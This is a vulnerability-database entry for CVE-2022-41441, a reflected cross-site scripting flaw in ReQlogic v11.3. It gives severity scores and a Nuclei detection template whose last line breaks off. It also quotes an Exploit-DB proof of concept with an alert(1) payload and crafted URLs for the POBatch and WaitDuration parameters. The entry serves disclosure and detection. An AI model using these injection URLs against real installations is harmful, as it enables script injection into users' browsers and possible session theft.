CVE-2022-41441
published 2023-01-20
Priority: P3 · 40 · medium · 6.1 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EXPLOIT
EPSS: 5.30% (91.6th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| reqlogic | reqlogic | — | — |
No detection rules found.
Exploit-DB
ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
exploitdb·2023-03-28
---
# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
# Date: 9 October 2022
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://reqlogic.com
# Version: 11.3
# Tested on: Linux
# CVE : 2022-41441
# Proof of Concept:
1- Install ReQlogic v11.3
2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3
3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.
#XSS Payload:
alert(1)
#Affected Parameters
POBatch
WaitDuration
#Final URLs
http://localhost:81/ProcessWait.aspx?POBatch=alert(1)&WaitDuration=3
http://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=alert(1)
Nuclei
ReQlogic v11.3 - Cross Site Scripting
nuclei·CVSS 6.1
ReQlogic v11.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.
Template:
```yaml
id: CVE-2022-41441
info:
  name: ReQlogic v11.3 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogi
```
References:
- http://packetstormsecurity.com/files/171557/ReQlogic-11.3-Cross-Site-Scripting.html
- http://reqlogic.com
- https://okankurtulus.com.tr/2023/01/17/reqlogic-v11-3-unauthenticated-reflected-cross-site-scripting-xss/
- https://reqlogic.com/